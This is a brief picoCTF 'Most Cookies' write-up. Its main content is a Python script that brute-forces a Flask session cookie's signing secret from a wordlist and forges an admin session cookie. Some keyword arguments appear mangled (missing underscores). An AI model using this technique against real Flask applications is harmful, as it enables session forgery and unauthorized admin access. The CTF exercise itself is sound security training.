Most Cookies - PicoCTF

Followed explanation at this link

Just remember to put your cookie inside the cookie variable and update the wordlist with the possible secrets used to sign the cookie.

import flask
import hashlib
from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
cookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'
wordlist = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
for secret in wordlist:
    try:
        serializer = URLSafeTimedSerializer(
            secretkey=secret,
            salt='cookie-session',
            serializer=TaggedJSONSerializer(),
            signer=TimestampSigner,
            signerkwargs={
                'keyderivation':'hmac',
                'digestmethod': hashlib.sha1}).loads(cookie)
    except BadSignature:
        continue
    print('Secret key: {}'.format(secret))
    session = {'veryauth': 'admin'}
    print(URLSafeTimedSerializer(secretkey=secret, salt='cookie-session', serializer=TaggedJSONSerializer(),signer=TimestampSigner,signerkwargs={'keyderivation': 'hmac', 'digest_method': hashlib.sha1}).dumps(session))